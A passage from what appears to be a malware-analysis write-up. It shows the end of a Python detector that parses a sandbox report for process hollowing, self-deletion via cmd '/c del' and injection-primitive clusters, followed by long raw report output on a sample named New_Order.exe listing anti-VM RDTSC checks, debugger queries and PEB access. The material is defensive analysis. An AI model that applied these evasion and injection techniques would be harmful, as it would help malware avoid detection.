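    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03969A20 NtResumeThread,LdrInitializeThunk,",
    r"Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_039699D0 NtCreateProcessEx,",
    r"Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A98A0 NtWriteVirtualMemory,",
    r"Source: C:\Windows\SysWOW64\wscript.exe | Code function: 7_2_048A9950 NtQueueApcThread,",
    r"Source: C:\Users\user\Desktop\New_Order.exe | Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,",
]

PROC_RE = re.compile(r"^Source:\s*(?P<parent>\S+)\s*\|\s*Process created:\s*(?P<image>\S+)\s*(?P<cmdline>.*)$")
FUNC_RE = re.compile(r"^Source:\s*(?P<image>\S+)\s*\|\s*Code function:\s*(?P<id>\S+)\s*(?P<calls>.*)$")

# Native calls that together implement write-into-another-process injection
# (assumed grouping for this example; the report does not define such a set).
INJECTION_PRIMITIVES = {
    "NtWriteVirtualMemory", "NtQueueApcThread", "NtSetContextThread", "NtResumeThread",
    "NtMapViewOfSection", "NtUnmapViewOfSection", "NtCreateProcessEx",
}
INJECTION_THRESHOLD = 4  # assumed: this many distinct primitives in one process is worth a finding


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def argv0(cmdline):
    """First token of a command line, honouring single quotes as the report prints them."""
    m = re.match(r"'([^']+)'|(\S+)", cmdline)
    return (m.group(1) or m.group(2)) if m else ""


def parse_report(lines):
    tree = defaultdict(list)    # parent image path -> [(child image path, command line)]
    natives = defaultdict(set)  # image path -> Nt* names seen in its Code function entries
    for line in lines:
        line = line.strip()
        m = PROC_RE.match(line)
        if m:
            tree[m["parent"]].append((m["image"], m["cmdline"].strip()))
            continue
        m = FUNC_RE.match(line)
        if m:
            natives[m["image"]] |= {c for c in m["calls"].split(",") if c.startswith("Nt")}
    return dict(tree), dict(natives)


def findings(tree, natives):
    out = []
    for parent, children in tree.items():
        for child, cmdline in children:
            a0 = argv0(cmdline)
            # Command line names a different executable than the image actually started:
            # the process-hollowing artefact (svchost.exe started as 'New_Order.exe').
            if a0.lower().endswith(".exe") and basename(a0) != basename(child):
                out.append(("hollowed_child", basename(parent), basename(child), a0))
            if basename(parent) == "explorer.exe" and basename(child) == "wscript.exe":
                out.append(("explorer_spawns_wscript", basename(parent), basename(child), cmdline))
            if basename(child) == "cmd.exe" and "/c del" in cmdline.lower():
                out.append(("self_delete", basename(parent), basename(child), cmdline))
    for image, calls in natives.items():
        hits = calls & INJECTION_PRIMITIVES
        if len(hits) >= INJECTION_THRESHOLD:
            out.append(("injection_primitives", basename(image), len(hits), sorted(hits)))
    return out


if __name__ == "__main__":
    for f in findings(*parse_report(REPORT_LINES)):
        print(f)
```

Note that the last check fires only for svchost.exe here: wscript.exe shows two of the primitives in the sampled lines, which is why a threshold rather than a single-call match keeps the signal meaningful, and why the hollowed-child check keys on argv[0] rather than on any quoted path (otherwise the `cmd.exe /c del '...svchost.exe'` line would be misreported as a hollowed child).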
          Source: C:\Users\user\Desktop\New_Order.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: New_Order.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.237522923.0000000003700000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, wscript.exe
          Source: Binary string: wscript.pdb source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: svchost.pdb source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
          Source: Binary string: svchost.pdbUGP source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00410109 push eax; iretd
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041A2F2 push es; ret
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00415BFC push ss; ret
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041B46C push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041B402 push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0041B40B push eax; ret
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004154D4 push ss; iretd
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00413E26 pushfd ; iretd
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00414EC1 push es; retf
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0397D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_048BD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00620109 push eax; iretd
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062A2F2 push es; ret
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00625BFC push ss; ret
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062B46C push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062B402 push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_0062B40B push eax; ret
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_006254D4 push ss; iretd
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00623E26 pushfd ; iretd
          Source: C:\Windows\SysWOW64\wscript.exe Code function: 7_2_00624EC1 push es; retf
          Source: C:\Users\user\Desktop\New_Order.exe File created: C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll
          Source: C:\Users\user\Desktop\New_Order.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 00000000006185E4 second address: 00000000006185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wscript.exe RDTSC instruction interceptor: First address: 000000000061897E second address: 0000000000618984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\New_Order.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004088B0 rdtsc
          Source: C:\Windows\explorer.exe TID: 5048 Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\wscript.exe TID: 6240 Thread sleep time: -44000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\wscript.exe Last function: Thread delayed
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_0040646B FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: explorer.exe, 00000002.00000000.258112198.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.244873438.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000002.501665466.0000000003767000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000002.496335851.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.258172711.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.507902104.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.258172711.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000002.00000000.257813494.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wscript.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004088B0 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_10001000 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_024D1790 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New_Order.exe Code function: 0_2_024D19A8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03931B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03931B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03954BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039503E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03953B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03953B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039252A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03925210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03925210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03943A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03938A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03964A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03964A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039EEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0396927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039DB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03952990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039561A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039B41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03944120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03944120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0392C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03929080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0393B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03940050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03940050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03938794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0394F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_039F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0395A70E mov eax, dword ptr fs:[00000030h]
